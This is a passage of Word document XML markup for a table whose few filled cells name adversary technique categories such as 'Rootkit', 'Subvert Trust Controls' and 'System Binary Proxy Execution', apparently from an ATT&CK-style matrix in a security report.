          <w:tcPr>
            <w:tcW w:w="286" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0BD046DE"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503B7D0D" w14:textId="2B7C3123" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
              <w:t>Rootkit</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="330" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="153943BA" w14:textId="77777777" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="711" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="50E7EE8B" w14:textId="53F13B29" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
              <w:t>Virtualization/Sandbox Evasion</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="286" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6CB71845" w14:textId="77777777" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="334" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="472AFDBC" w14:textId="77777777" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="334" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5754FA13" w14:textId="77777777" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="334" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="720A9081" w14:textId="77777777" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="178" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1A568A65" w14:textId="77777777" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EA36F8" w:rsidRPr="001019D3" w14:paraId="728CBF77" w14:textId="77777777" w:rsidTr="00591FD8">
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="383" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1E805305" w14:textId="77777777" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="335" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3BFD9EA3"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0BBBB96C" w14:textId="77777777" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="381" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3BC50E6B" w14:textId="77777777" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="334" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="11C702D4" w14:textId="77777777" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="286" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1AC43E55"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75980902" w14:textId="5675D751" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
              <w:t>Selective Exclusion</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="330" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="649E9287" w14:textId="77777777" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="711" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3268282D" w14:textId="77777777" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="286" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="60DA05BC" w14:textId="77777777" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="334" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="271AF0C3" w14:textId="77777777" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="334" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4F933F28" w14:textId="77777777" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="334" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5EEAC4F6" w14:textId="77777777" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="178" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6F92ECA1" w14:textId="77777777" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EA36F8" w:rsidRPr="001019D3" w14:paraId="3C85D8F1" w14:textId="77777777" w:rsidTr="00591FD8">
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="383" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1C9A367D" w14:textId="77777777" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="335" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="63290F6E"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3941EDBE" w14:textId="77777777" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="381" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="314A5263" w14:textId="77777777" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="334" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0B477AEE" w14:textId="77777777" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="286" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5043C391"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52B279FA" w14:textId="01D222D5" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
              <w:t>Subvert Trust Controls</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="330" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="23FE3FAB" w14:textId="77777777" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="711" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6BDD4069" w14:textId="77777777" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="286" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="21FCEC50" w14:textId="77777777" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="334" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7F028FC0" w14:textId="77777777" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="334" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2051BF06" w14:textId="77777777" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="334" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7B1A0FD5" w14:textId="77777777" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="178" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="31DE6999" w14:textId="77777777" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EA36F8" w:rsidRPr="001019D3" w14:paraId="727F8482" w14:textId="77777777" w:rsidTr="00591FD8">
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="383" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="75E05E87" w14:textId="77777777" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="335" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3B975E19"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3901C511" w14:textId="77777777" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="381" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="13F1EACE" w14:textId="77777777" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="334" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="42C99B35" w14:textId="77777777" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="286" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4B5406D6"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71971DA0" w14:textId="758F0823" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
              <w:t>System Binary Proxy Execution</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="330" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4D5873D1" w14:textId="77777777" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="711" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="555FF9F5" w14:textId="77777777" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="286" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5E050E75" w14:textId="77777777" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="334" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="03089246" w14:textId="77777777" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="334" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7AE02CE4" w14:textId="77777777" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="334" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="05272025" w14:textId="77777777" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="178" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4908D27B" w14:textId="77777777" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EA36F8" w:rsidRPr="001019D3" w14:paraId="33DFB8F6" w14:textId="77777777" w:rsidTr="00591FD8">
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="383" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="210B688A" w14:textId="77777777" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="335" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4DB62C9B"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60DA122B" w14:textId="77777777" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="381" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="28F7EFFD" w14:textId="77777777" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
